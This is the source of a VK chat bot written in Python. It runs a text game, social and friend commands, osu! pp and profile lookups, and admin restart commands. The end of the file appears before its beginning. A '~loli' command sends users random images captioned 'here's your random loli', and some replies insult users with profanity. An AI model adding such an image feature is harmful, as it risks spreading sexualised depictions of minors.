                                    vk.messages.send(random_id=0, user_id=uid, message=gamehelp['sell'])
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message="Upgrade account to the latest version with '!upgrade' command")
                    if event.text.startswith("!tradeinv"):
                        if ut.checkVersion(uid) >= ver.latestVersion:
                            if len(event.text.split()) == 1:
                                vk.messages.send(random_id=0, user_id=uid, message=com.showTradeInventory(uid))
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message=gamehelp['tradeinv'])
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message="Upgrade account to the latest version with '!upgrade' command")
                    if event.text.startswith("!tileplayers"):
                        if uid in ingame:
                            if len(event.text.split()) == 1:
                                vk.messages.send(random_id=0, user_id=uid, message=com.playersOnTile(uid))
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message=gamehelp['tileplayers'])
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
                    # ---------------- social "/" commands ----------------
                    if event.text.startswith("/pm"):
                        if uid in ingame:
                            if len(event.text.split()) > 2:
                                target = event.text.split()[1]
                                # BUGFIX: int() on a non-numeric id raised an
                                # uncaught ValueError and killed the loop.
                                if not target.isdigit() or int(target) not in ingame:
                                    vk.messages.send(random_id=0, user_id=uid, message="User isn't in game")
                                else:
                                    if ut.inFriends(uid, target):
                                        vk.messages.send(random_id=0, user_id=target, message=f"{com.searchByID(uid)}(PM): {' '.join(event.text.split()[2:])}")
                                        # BUGFIX: the echo to the sender showed the raw
                                        # list repr instead of the joined message.
                                        vk.messages.send(random_id=0, user_id=uid, message=f"{com.searchByID(uid)}(PM): {' '.join(event.text.split()[2:])}")
                                    else:
                                        vk.messages.send(random_id=0, user_id=uid, message="This user isn't in your friendlist")
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message=sochelp['pm'])
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
                    if event.text.startswith("/sendmoney"):
                        if len(event.text.split()) == 3:
                            vk.messages.send(random_id=0, user_id=uid, message=com.sendMoney(uid, event.text.split()[1], event.text.split()[2]))
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=sochelp['sendmoney'])
                    if event.text.startswith("/sendgift"):
                        if ut.isExist(uid):
                            if ut.checkVersion(uid) >= ver.latestVersion:
                                if len(event.text.split()) >= 3:
                                    if ut.checkVersion(event.text.split()[1]) >= 51:
                                        vk.messages.send(random_id=0, user_id=uid, message=com.sendGift(uid, event.text.split()[1], event.text.split()[2], event.text.split()[3:]))
                                    else:
                                        vk.messages.send(random_id=0, user_id=uid, message="This account have version lower than 51 or not registered")
                                else:
                                    vk.messages.send(random_id=0, user_id=uid, message=sochelp['sendgift'])
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message="Upgrade account to the latest version with '!upgrade' command.")
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message="Register first")
                    if event.text.startswith("/acceptgift"):
                        if ut.isExist(uid):
                            if ut.checkVersion(uid) >= ver.latestVersion:
                                if len(event.text.split()) == 2:
                                    vk.messages.send(random_id=0, user_id=uid, message=com.acceptGift(uid, event.text.split()[1]))
                                else:
                                    vk.messages.send(random_id=0, user_id=uid, message=sochelp['acceptgift'])
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message="Upgrade account to the latest version with '!upgrade' command.")
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message="Register first")
                    if event.text.startswith("/rejectgift"):
                        # BUGFIX: was a bare `isExist(uid)` (NameError — the module
                        # is imported as `ut`), unlike the sibling gift commands.
                        if ut.isExist(uid):
                            if ut.checkVersion(uid) >= ver.latestVersion:
                                if len(event.text.split()) == 2:
                                    vk.messages.send(random_id=0, user_id=uid, message=com.rejectGift(uid, event.text.split()[1]))
                                else:
                                    vk.messages.send(random_id=0, user_id=uid, message=sochelp['rejectgift'])
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message="Upgrade account to the latest version with '!upgrade' command.")
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message="Register first")
                    if event.text.startswith("/chat"):
                        if uid in ingame:
                            if len(event.text.split()) == 1:
                                vk.messages.send(random_id=0, user_id=uid, message="You don't wrote the message")
                            else:
                                sh.chat(uid, event.text.split()[1:], False)
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
                    if event.text.startswith("/me"):
                        if uid in ingame:
                            if len(event.text.split()) == 1:
                                vk.messages.send(random_id=0, user_id=uid, message="You don't wrote the message")
                            else:
                                sh.chat(uid, event.text.split()[1:], True)
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message="You must be in session")
                    if event.text.startswith("/addfriend"):
                        if len(event.text.split()) == 2:
                            vk.messages.send(random_id=0, user_id=uid, message=com.addFriend(uid, event.text.split()[1]))
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=sochelp['addfriend'])
                    if event.text.startswith("/denyrequest"):
                        if len(event.text.split()) == 2:
                            vk.messages.send(random_id=0, user_id=uid, message=com.denyFriendRequest(uid, event.text.split()[1]))
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=sochelp['denyrequest'])
                    if event.text.startswith("/friendlist"):
                        if len(event.text.split()) == 1:
                            vk.messages.send(random_id=0, user_id=uid, message=com.friendList(uid))
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=sochelp['friendlist'])
                    if event.text.startswith("/removefriend"):
                        if len(event.text.split()) == 2:
                            vk.messages.send(random_id=0, user_id=uid, message=com.removeFriend(uid, event.text.split()[1]))
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=sochelp['removefriend'])
                    if event.text.startswith('!leave'):
                        if len(event.text.split()) == 1:
                            if uid in ingame:
                                ingame.remove(uid)
                                com.mapLeave(uid)
                                vk.messages.send(random_id=0, user_id=uid, message="Account removed from session")
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message="Account isn't in session")
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=comhelp['leave'])
                    if event.text.startswith("!save"):
                        if len(event.text.split()) == 1:
                            vk.messages.send(random_id=0, user_id=uid, message=com.save(uid))
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=gamehelp['save'])
                    if event.text.startswith('!whereami'):
                        if len(event.text.split()) == 1:
                            kurwa = com.getCoords(uid)
                            vk.messages.send(random_id=0, user_id=uid, message=f"You're on ({kurwa[0]};{kurwa[1]}) (x;y)")
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=gamehelp['whereami'])
                    if event.text.startswith("~!!dropsession"):
                        if event.user_id == cid:
                            if ingame:
                                # BUGFIX: iterate over a copy — removing from the
                                # list while iterating it skipped every other player.
                                for i in list(ingame):
                                    ingame.remove(i)
                                    com.mapLeave(i)
                                    vk.messages.send(random_id=0, user_id=i, message="Your account has been forcibly removed from the session.")
                                    vk.messages.send(random_id=0, user_id=uid, message=f"{vk.users.get(user_ids=i)[0]['first_name']} был удалён из сессии")
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message='Никого в сессии нет, еблан')
                    # ---------------- help pages ----------------
                    if event.text.split()[0] in ["~", "~help"]:
                        if len(event.text.split()) == 1:
                            msg = f"""These commands have the prefix "~":
help: {comhelp['help']}
osuhelp: {comhelp['osuhelp']}
gamehelp: {comhelp['gamehelp']}
socialhelp: {comhelp['socialhelp']}
ping: {comhelp['ping']}
uploadmany: {comhelp['uploadmany']}
"""
                            vk.messages.send(random_id=0, user_id=uid, message=msg)
                        elif len(event.text.split()) == 2:
                            arg = event.text.split()[1]
                            if arg in comhelp:
                                vk.messages.send(random_id=0, user_id=uid, message=comhelp[arg])
                            # BUGFIX: int() on a non-numeric argument raised an
                            # uncaught ValueError; also the page-2 text was built
                            # but never actually sent.
                            elif arg.isdigit() and int(arg) == 2:
                                # NOTE(review): comhelp may not define 'description';
                                # a KeyError here is swallowed by the outer handler —
                                # confirm the key exists.
                                msg = f"""~help page 2:
description: {comhelp['description']}
ruleofinternet: {comhelp['ruleofinternet']}
loli: {comhelp['loli']}
uploadone: {comhelp['upload']}
"""
                                vk.messages.send(random_id=0, user_id=uid, message=msg)
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message="Command is not found. Try ~help")
                    if event.text.split()[0] in ["!", "~gamehelp", "!help"]:
                        if len(event.text.split()) == 1:
                            msg = f"""These commands have the prefix "!"
register: {gamehelp['register']}
unregister: {gamehelp['unregister']}
version: {gamehelp['version']}
upgrade: {gamehelp['upgrade']}
enter: {gamehelp['enter']}
leave: {gamehelp['leave']}
whereami: {gamehelp['whereami']}
move: {gamehelp['move']}
"""
                            vk.messages.send(random_id=0, user_id=uid, message=msg)
                        if len(event.text.split()) == 2:
                            arg = event.text.split()[1]
                            if arg in gamehelp:
                                vk.messages.send(random_id=0, user_id=uid, message=gamehelp[arg])
                            # BUGFIX: int() on a non-numeric argument raised an
                            # uncaught ValueError and killed the loop.
                            elif arg.isdigit() and int(arg) in (2, 3):
                                if int(arg) == 2:
                                    msg = f"""~gamehelp page 2:
save: {gamehelp['save']}
open: {gamehelp['open']}
showinv: {gamehelp['showinv']}
tradeinv: {gamehelp['tradeinv']}
action: {gamehelp['action']}
itemlist: {gamehelp['itemlist']}
buy: {gamehelp['buy']}
sell: {gamehelp['sell']}
"""
                                    vk.messages.send(random_id=0, user_id=uid, message=msg)
                                if int(arg) == 3:
                                    msg = f"""~gamehelp page 3:
tileplayers: {gamehelp['tileplayers']}
"""
                                    vk.messages.send(random_id=0, user_id=uid, message=msg)
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message="Command is not found. Try ~gamehelp")
                    if event.text.split()[0] in ["/", "~socialhelp", "/help"]:
                        if len(event.text.split()) == 1:
                            # BUGFIX: the "friendlist" label was misspelled "firendlist".
                            msg = f"""These commands have the prefix "/"
chat: {sochelp['chat']}
me: {sochelp['me']}
addfriend: {sochelp['addfriend']}
removefriend: {sochelp['removefriend']}
denyrequest: {sochelp['denyrequest']}
friendlist: {sochelp['friendlist']}
sendmoney: {sochelp['sendmoney']}
sendgift: {sochelp['sendgift']}
"""
                            vk.messages.send(random_id=0, user_id=uid, message=msg)
                        if len(event.text.split()) == 2:
                            if event.text.split()[1] in sochelp:
                                vk.messages.send(random_id=0, user_id=uid, message=sochelp[event.text.split()[1]])
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message="Command is not found. Try ~socialhelp")
                    if event.text.split()[0] in ["o!", "~osuhelp", "o!help"]:
                        if len(event.text.split()) == 1:
                            msg = f"""These commands have the prefix "o!"
pp: {osuhelp["pp"]}
register: {osuhelp["register"]}
change: {osuhelp["change"]}
recent: {osuhelp["recent"]}
me: {osuhelp["me"]}
changeavatar: {osuhelp["changeavatar"]}
"""
                            vk.messages.send(random_id=0, user_id=uid, message=msg)
                        if len(event.text.split()) == 2:
                            if event.text.split()[1] == "pp":
                                vk.messages.send(random_id=0, user_id=uid, message=osuhelp["ppextended"])
                            elif event.text.split()[1] in osuhelp:
                                vk.messages.send(random_id=0, user_id=uid, message=osuhelp[event.text.split()[1]])
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message="Commands is not found. Try ~osuhelp")
        # Per-iteration failures restart the listen loop instead of
        # killing the bot; the offending exception is printed for triage.
        except UnboundLocalError as e:
            print(f"Catched a UnboundLocalError exception, restart: {e}")
            continue
        except TypeError as e:
            print(f"Catched a TypeError exception, restart: {e}")
            continue
        except NameError as e:
            print(f"Catched a NameError exception, restart: {e}")
            continue
        except KeyError as e:
            print(f"Catched a KeyError exception, restart: {e}")
            continue
        except ZeroDivisionError:
            pass
# Script entry point: start the long-poll dispatch loop (runs until
# ~shutdown / ~restart or the process is killed).
if __name__ == '__main__':
    main()
| from vk_api.longpoll import VkLongPoll, VkEventType
from time import gmtime, strftime
from importlib import reload
import vk_api
import sys
import os
import osu.calc as calc
import osucommands
import sessionhandler as sh
import utils as ut
import random
import urllib.request
import versions as ver
import commands as com
# VK user ids whose accounts are currently inside a game session.
ingame = []

# Help texts for the "~" (general) command set, shown by ~help.
comhelp = {
    "help": "show the help message for command/to see commands list // ~help | ~ [command or page number (2)]",
    "osuhelp": "show the help message for osu-like commands // ~osuhelp | o! | o!help [command]",
    "pingS": "u can't write \"~ping\"?",
    "ping": "just ping the bot // ~ping",
    "ruleofinternet": "check the interesting rule (ex. 34) // ~rofi | ~ruleofinternet (number/\"random\")",
    "gamehelp": "help for ingame commands // ~gamehelp | ! | !help [command or page number(2, 3)]",
    "socialhelp": "help for social commands // ~socialhelp | \"/\" | \"/help\" [command]",
    "loli": "catch the random loli // ~loli",
    "upload": "upload the picture to bot's drive // ~uploadone (photo attachment)",
    "uploadmany": "upload the pictureS to bot's drive // ~uploadone (photo attachmentS)",
}
# Help texts for the "!" (game) command set, shown by ~gamehelp.
gamehelp = {
    "enter": "enter to the world! // !enter",
    "version": "find out account version // !version",
    "upgrade": "upgrate to latest account version // !upgrade",
    "register": "register the account // !register",
    "unregister": "delete the account // !unregister",
    "whereami": "we know where are you (x;y) // !whereami",
    "description": "see item desc in ur inv. // !description",
    "tradeinv": "see your trade inv. // !tradeinv",
    "showinv": "see your inv. // !showinv",
    "move": "move is some direction // !move (right, left, up, down)",
    "leave": "leave the session // !leave",
    "tileplayers": "see all players on your tile // !tileplayers",
    "save": "save your position // !save",
    "open": "open the chest if u're on it // !open",
    "action": "action w/ item in inventory // !action (item number in inv.)",
    "itemlist": "check the item list in the shop // !itemlist",
    "buy": "buy the item // !buy (item number in merchant's inv.)",
    "sell": "sell the item // !sell (item number in inventory)",
    "actlist": "show the actions list that u can do // !actlist",
}
# Help texts for the "/" (social) command set, shown by ~socialhelp.
sochelp = {
    "chat": "chat with players on your tile (ONLY in game) // /chat (message)",
    "addfriend": "send/accept friend request // /addfriend (ID)",
    "denyrequest": "deny/cancel friend request // /denyrequest (ID)",
    "friendlist": "your friend list // /friendlist",
    "me": "do something in chat (like hug someone) (ONLY in game) // /me (action(message))",
    "pm": "send private message to friend (ONLY in game) // /pm (friendID) (message)",
    "removefriend": "remove user from your friend list // /removefriend (friendID)",
    "sendmoney": "send money to user // /sendmoney (userID) (count)",
    "sendgift": "send gift to your friend // /sendgift (friendID) (item number in inventory) (message)",
}
# Help texts for the "o!" (osu!) command set, shown by ~osuhelp.
osuhelp = {
    "pp": "check pp for map // o!pp (link) [args (check ~osuhelp pp)]",
    "ppextended": """check pp for map // o!pp (link) [args (--oppai recommended)]
Arguments:
-m, --mods (HRHDDT-like)
-a, --acc (float number like, ex. 99.9 (if more then 100.0, equals to 100.0))
-o, --offline | --oppai (use the local calculation (also can calculate unranked maps))""",
    "register": "register as user to get recent scores for your profile // o!register (Username or ID in osu!)",
    "recent": "view your/user's recent score // o!recent [Username or ID in osu!]",
    "change": "change your osu! profile // o!change (Username or ID in osu!)",
    "me": "see your osu!profile // o!me",
    "changeavatar": "redownload your avatar if you changed it // o!changeavatar",
}
# --- VK API bootstrap (module level) ---
# Group/bot token: drives the long-poll listener and outgoing messages.
with open('token.txt', 'r') as f:
    token = f.read()
vk_session = vk_api.VkApi(token=token)
longpoll = VkLongPoll(vk_session)
print("Longpool authorized.")
vk = vk_session.get_api()
print("API things authorized.")
# Personal user token: used for calls a group token can't make
# (e.g. photos.getById in the ~uploadone / ~uploadmany handlers).
with open("usertoken.txt", "r") as uf:
    usertoken = uf.read()
uservkSession = vk_api.VkApi(token=usertoken)
uvk = uservkSession.get_api()
print("User API things authorized.")
def main():
    """Run the bot's long-poll event loop forever.

    Restores state after a ~restart, then dispatches every incoming
    private message to a handler chosen by its prefix:
      ~  misc bot commands    !  game commands
      /  social commands      o! osu! commands
    A handful of "expected" exception types make the loop restart
    instead of killing the process.
    """
    upload = vk_api.VkUpload(vk_session)
    # VK id of the bot's owner; admin-only commands compare against it.
    with open('creator.txt', 'r') as c:
        cid = int(c.read())
    # '.rsttemp' is written by ~restart just before re-exec; if present,
    # tell the requesting user the restart finished and remove the marker.
    if os.path.isfile('.rsttemp'):
        with open('.rsttemp') as f:
            uid = f.read()
        os.remove('.rsttemp')
        vk.messages.send(random_id=0, user_id=uid, message="Bot restarted")
    print("---------------Rdy to use---------------")
    while True:
        try:
            for event in longpoll.listen():
                if event.type == VkEventType.MESSAGE_NEW and event.to_me and event.text:
                    uid = event.user_id
                    osc = osucommands.commands(uid)
                    userData = vk.users.get(user_ids=uid)[0]
                    userName = userData['first_name']
                    userLastName = userData['last_name']
                    # ---------- misc commands (~) ----------
                    if event.text.startswith("~loli"):
                        if len(event.text.split()) == 1:
                            directory = "\\photos"
                            photo = random.choice(os.listdir(directory))
                            # FIX: the original concatenated directory+photo with
                            # no path separator; join the pieces properly.
                            onUpload = upload.photo_messages(photos=os.path.join(directory, photo))[0]
                            vk.messages.send(random_id=0, user_id=uid, message="here's your random loli", attachment=f"photo{onUpload['owner_id']}_{onUpload['id']}")
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=comhelp['loli'])
                    if event.text.startswith("~uploadone"):
                        if len(event.text.split()) == 1:
                            # Long-poll attachments arrive as attachN/attachN_type
                            # pairs, so one photo means exactly two dict entries.
                            if len(event.attachments) == 2:
                                print(event.attachments)
                                if event.attachments["attach1_type"] == "photo":
                                    photo = uvk.photos.getById(photos=event.attachments["attach1"])[0]["sizes"][-1]
                                    urllib.request.urlretrieve(photo["url"], os.path.join("photos", f"{photo['url'].split('/')[-1]}"))
                                    vk.messages.send(random_id=0, user_id=uid, message="Successfully uploaded on bot\'s drive")
                                else:
                                    vk.messages.send(random_id=0, user_id=uid, message=f"The attachment type must be 'photo', not {event.attachments['attach1_type']}")
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message="You can upload only one image")
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=comhelp["upload"])
                    if event.text.startswith("~uploadmany"):
                        if len(event.attachments) >= 2:
                            urls = []
                            # attachN/attachN_type pairs -> len(...)//2 candidates.
                            for att in range(1, len(event.attachments) // 2 + 1):
                                if event.attachments[f"attach{att}_type"] == "photo":
                                    urls.append(uvk.photos.getById(photos=event.attachments[f"attach{att}"])[0]["sizes"][-1]["url"])
                                else:
                                    vk.messages.send(random_id=0, user_id=uid, message=f"Attachment {att} will not be uploaded (attachmentType:{event.attachments[f'attach{att}_type']})")
                            if urls:
                                dots = f"00.00%: 0/{len(urls)}"
                                # messages.send returns the new message id; reuse it
                                # to edit the same message into a progress bar.
                                message = vk.messages.send(random_id=0, user_id=uid, message=f"{dots}")
                                print(message)
                                for url in enumerate(urls):
                                    urllib.request.urlretrieve(url[1], os.path.join("photos", f"{url[1].split('/')[-1]}"))
                                    dots = ("=" * url[0]) + ">"
                                    vk.messages.edit(peer_id=uid, message_id=message, message=f"{ut.toFixed((url[0]+1)/len(urls) * 100, 2)}% | {url[0]+1}/{len(urls)}")
                                vk.messages.edit(peer_id=uid, message_id=message, message="Attachments uploaded to bot's drive")
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message="You don't attached anything")
                    # 2 commands w/ secret syntax
                    # ---------- osu! commands (o!) ----------
                    if event.text.startswith("o!pp"):
                        if len(event.text.split()) >= 2:
                            if ut.checkURL(event.text.split()[1]):
                                stats = {"acc": 0.0, "mods": "", "combo": 0}
                                # Note: the long flags deliberately use an em dash
                                # ("—acc"), matching what VK turns "--acc" into.
                                if any(i in event.text.split() for i in ["-a", "—acc"]):
                                    a = "-a" if "-a" in event.text.split() else "—acc"
                                    ind = event.text.split().index(a)
                                    # FIX: bare except narrowed; float() raises
                                    # ValueError, a missing value raises IndexError.
                                    try:
                                        acc = float(event.text.split()[ind+1])
                                        stats["acc"] = acc
                                        if acc > 100:
                                            vk.messages.send(random_id=0, user_id=uid, message=f'Accuracy can\'t be more than 100% (entered {acc}), equate to 100%')
                                            stats["acc"] = 0.0
                                        if acc < 0:
                                            vk.messages.send(random_id=0, user_id=uid, message=f'Accuracy can\'t be less than 0% (entered {acc}), equate to {acc} module')
                                            stats["acc"] = -acc
                                    except (ValueError, IndexError):
                                        vk.messages.send(random_id=0, user_id=uid, message='"acc" argument entered wrong')
                                if "-combo" in event.text.split():
                                    ind = event.text.split().index("-combo")
                                    try:
                                        stats["combo"] = int(event.text.split()[ind+1])
                                    except (ValueError, IndexError):
                                        vk.messages.send(random_id=0, user_id=uid, message='"-combo" argument entered wrong')
                                if any(i in event.text.split() for i in ["-m", "—mods"]):
                                    m = "-m" if "-m" in event.text.split() else "—mods"
                                    ind = event.text.split().index(m)
                                    # NOTE(review): a trailing "-m" with no value still
                                    # raises IndexError here — confirm desired behavior.
                                    if len(event.text.split()[ind+1]) <= 1:
                                        # FIX: was vk.messasges (typo -> AttributeError).
                                        vk.messages.send(random_id=0, user_id=uid, message='"mods" argument entered wrong')
                                    elif event.text.split()[ind+1].startswith('-'):
                                        vk.messages.send(random_id=0, user_id=uid, message='"mods" argument entered wrong')
                                    else:
                                        # Split the mod string into 2-char chunks: "HRDT" -> ["HR", "DT"].
                                        s = [event.text.split()[ind+1][i:i+2] for i in range(0, len(event.text.split()[ind+1]), 2)]
                                        wm = []
                                        # FIX: conditions were '"HR" and "EZ" in s' (always
                                        # tests only the second membership) and
                                        # random.choice was called with two arguments.
                                        if "HR" in s and "EZ" in s:
                                            vk.messages.send(random_id=0, user_id=uid, message="HR and EZ can't be in one selection")
                                            del s[random.choice([s.index("HR"), s.index("EZ")])]
                                        if "DT" in s and "HF" in s:
                                            vk.messages.send(random_id=0, user_id=uid, message="DT and HF can't be in one selection")
                                            del s[random.choice([s.index("DT"), s.index("HF")])]
                                        if "NF" in s and ("SD" in s or "PF" in s):
                                            vk.messages.send(random_id=0, user_id=uid, message="NF and SD/PF can't be in one selection")
                                        if "RX" in s or "AP" in s:
                                            vk.messages.send(random_id=0, user_id=uid, message="RX and AP mods aren't provided when calcucating pp")
                                        # FIX: iterate over a copy — the body deletes from s.
                                        for i in list(s):
                                            if i.upper() == "RX":
                                                del s[s.index(i)]
                                            elif i.upper() == "AP":
                                                del s[s.index(i)]
                                            elif i.upper() == "SD":
                                                del s[s.index(i)]
                                                stats["misses"] = 0
                                            elif i.upper() == "PF":
                                                del s[s.index(i)]
                                                stats["acc"] = 0.0
                                            elif i.upper() in ["HR", "HD", "DT", "NC", "FL", "EZ", "NF", "HT"]:
                                                stats["mods"] += i.upper()
                                            else:
                                                wm.append(i)
                                        if wm:
                                            # FIX: was send(f"...") with no random_id/user_id.
                                            vk.messages.send(random_id=0, user_id=uid, message=f"These mods aren't exist: {', '.join(wm)}")
                                msg = event.text
                                link = msg.split()[1]
                                if not link.startswith("https://"):
                                    link = f"https://{link}"
                                # Renamed from 'map' to avoid shadowing the builtin.
                                bmap = None
                                if any(i in event.text.split() for i in ["-o", "—oppai", "—offline"]):
                                    bmap = osc.calcOppai(link, acc=stats['acc'], mods=stats['mods'])
                                if not bmap:
                                    if osc.checkStatus(link):
                                        bmap = osc.calcTillerino(link, acc=stats['acc'], mods=stats['mods'])
                                        if not bmap:
                                            message = vk.messages.send(random_id=0, user_id=uid, message="An error has occured when trying to do things w/ Tillerino API")
                                            bmap = calc.calcMap(link,
                                                                acc=stats['acc'],
                                                                combo=stats['combo'],
                                                                amods=stats['mods'],
                                                                uid=uid,
                                                                messageid=message,
                                                                t=token)
                                    else:
                                        bmap = "Beatmap status should be Ranked (or use -oppai)"
                                # A dict is a successful calculation; a str is an error text.
                                if isinstance(bmap, dict):
                                    onUpload = None
                                    # NOTE(review): 'not bmap' is true only for an empty
                                    # dict, in which case bmap['beatmapid'] would raise —
                                    # this branch looks like it meant to test the
                                    # oppai/offline path instead; confirm.
                                    if not bmap:
                                        onUpload = upload.photo_messages(f"osu\\tmp\\dotosu\\Beatmap-{bmap['beatmapid']}\\thumbnail.jpg")[0]
                                    else:
                                        onUpload = upload.photo_messages(f"tmpthumbs\\{bmap['beatmapsetid']}.jpg")[0]
                                    length = strftime("%M:%S", gmtime(int(osucommands.getLength(bmap["beatmapid"]))))
                                    msg = f"""Title: {bmap['title']}
Length: {length}
AR: {bmap['AR']} | CS: {bmap['CS']} | OD: {bmap['OD']}
Stars: {bmap['stars']}
Combo: {bmap['combo']}/{bmap['maxcombo']}
PP: """
                                    if len(bmap["PP"]) == 1:
                                        msg += f"{bmap['PP'][0]}\nAccuracy: {bmap['acc']}%"
                                    else:
                                        # Multiple PP values map to 95..100% accuracy steps.
                                        for i in enumerate(bmap['PP']):
                                            msg += f"{i[0]+95}%: {i[1]}pp | " if i[0] != len(bmap["PP"])-1 else f"{i[0]+95}%: {i[1]}pp"
                                    vk.messages.send(random_id=0, user_id=uid, message=msg,
                                                     attachment=f"photo{onUpload['owner_id']}_{onUpload['id']}")
                                else:
                                    vk.messages.send(random_id=0, user_id=uid, message=bmap)
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message="Please, recheck URL")
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=osuhelp["pp"])
                    if event.text.split()[0] in ["o!r", "o!recent"]:
                        if len(event.text.split()) == 1:
                            # recentScore() -> (text, beatmapset id or falsy).
                            d = osc.recentScore()
                            if d[1]:
                                onUpload = upload.photo_messages(f"tmpthumbs\\{d[1]}.jpg")[0]
                                vk.messages.send(random_id=0, user_id=uid, message=d[0],
                                                 attachment=f"photo{onUpload['owner_id']}_{onUpload['id']}")
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message=d[0])
                        if len(event.text.split()) == 2:
                            d = osc.recentScore(event.text.split()[1])
                            if d[1]:
                                onUpload = upload.photo_messages(f"tmpthumbs\\{d[1]}.jpg")[0]
                                vk.messages.send(random_id=0, user_id=uid, message=d[0],
                                                 attachment=f"photo{onUpload['owner_id']}_{onUpload['id']}")
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message=d[0])
                        if len(event.text.split()) == 3:
                            vk.messages.send(random_id=0, user_id=uid, message=osuhelp["recent"])
                    if event.text.split()[0] in ["o!change", "o!c"]:
                        if len(event.text.split()) == 2:
                            vk.messages.send(random_id=0, user_id=uid, message=osucommands.change(uid, event.text.split()[1]))
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=osuhelp["change"])
                    if event.text.split()[0] in ["o!reg", "o!register"]:
                        if len(event.text.split()) == 2:
                            vk.messages.send(random_id=0, user_id=uid, message=osucommands.register(uid, event.text.split()[1]))
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=osuhelp["register"])
                    if event.text.startswith("o!changeavatar"):
                        if len(event.text.split()) == 1:
                            vk.messages.send(random_id=0, user_id=uid, message=osc.changeAvatar())
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=osuhelp["changeavatar"])
                    if event.text.startswith("o!me"):
                        if len(event.text.split()) == 1:
                            user = osc.me()
                            if isinstance(user, dict):
                                onUpload = upload.photo_messages(user["avatarPath"])[0]
                                if user["username"].lower().endswith("s"):
                                    user["username"] += "'"
                                else:
                                    user["username"] += "'s"
                                # FIX: the f-string below used double quotes inside a
                                # double-quoted f-string — a SyntaxError before 3.12.
                                msg = f"""{user['username']} profile
PP: {user['pp']}
Accuracy: {user['acc']}%
Level: {user['level']}
Global Rank / Country Rank: #{user['rank']} / #{user['countryrank']} ({user['country']})
{user['playcount']} plays total
Hits: {user['x300']} x300 | {user['x100']} x100 | {user['x50']} x50
SS/SSH ranks: {user['SS']} / {user['SSH']}
S/SH ranks: {user['S']} / {user['SH']}
A ranks: {user['A']}
"""
                                vk.messages.send(random_id=0, user_id=uid, message=msg,
                                                 attachment=f"photo{onUpload['owner_id']}_{onUpload['id']}")
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=osuhelp["me"])
                    if event.text.startswith("!test"):
                        if len(event.text.split()) >= 2:
                            print(event.text.split())
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message='n')
                    if event.text.startswith('~ping'):
                        if len(event.text.split()) == 1:
                            vk.messages.send(random_id=0, user_id=uid, message='понг блядь')
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=comhelp['pingS'])
                    # ---------- admin commands ----------
                    if event.text.startswith('~shutdown'):
                        if event.user_id == cid:
                            vk.messages.send(random_id=0, user_id=uid, message='Shutting down...')
                            raise SystemExit
                    if event.text.startswith('~restart'):
                        if event.user_id == cid:
                            if ingame:
                                # FIX: iterate a copy — the body removes from ingame,
                                # which used to skip every other player.
                                for i in list(ingame):
                                    ingame.remove(i)
                                    com.mapLeave(i)
                                    vk.messages.send(random_id=0, user_id=i, message="Your account has been forcibly removed from the session.")
                                    vk.messages.send(random_id=0, user_id=uid, message=f"{vk.users.get(user_ids=i)[0]['first_name']} был удалён из сессии")
                            vk.messages.send(random_id=0, user_id=uid, message='Restarting bot...')
                            print("Started restart")
                            # Marker picked up at the top of main() after re-exec.
                            with open('.rsttemp', 'w') as f:
                                f.write(str(event.user_id))
                            os.execv(sys.executable, ['python'] + sys.argv)
                    if event.text.startswith('~reload'):
                        if event.user_id == cid:
                            if len(event.text.split()) == 2:
                                if event.text.split()[1] in ["sh", "com", "ver", "utils"]:
                                    if event.text.split()[1] == "sh":
                                        reload(sh)
                                    if event.text.split()[1] == "com":
                                        reload(com)
                                    if event.text.split()[1] == "ver":
                                        reload(ver)
                                    if event.text.split()[1] == "utils":
                                        reload(utils)
                                    vk.messages.send(random_id=0, user_id=uid, message=f"Module \"{event.text.split()[1]}\" reloaded")
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message="~reload (module)")
                    if event.text.startswith('~ruleofinternet') or event.text.startswith('~rofi'):
                        if len(event.text.split()) == 2:
                            if event.text.split()[1] == 'random':
                                randrule = str(random.randint(1, 49))
                                vk.messages.send(random_id=0, user_id=uid, message=com.rofi(randrule))
                            else:
                                vk.messages.send(random_id=0, user_id=uid, message=com.rofi(event.text.split()[1]))
                        else:
                            vk.messages.send(random_id=0, user_id=uid, message=comhelp['ruleofinternet'])
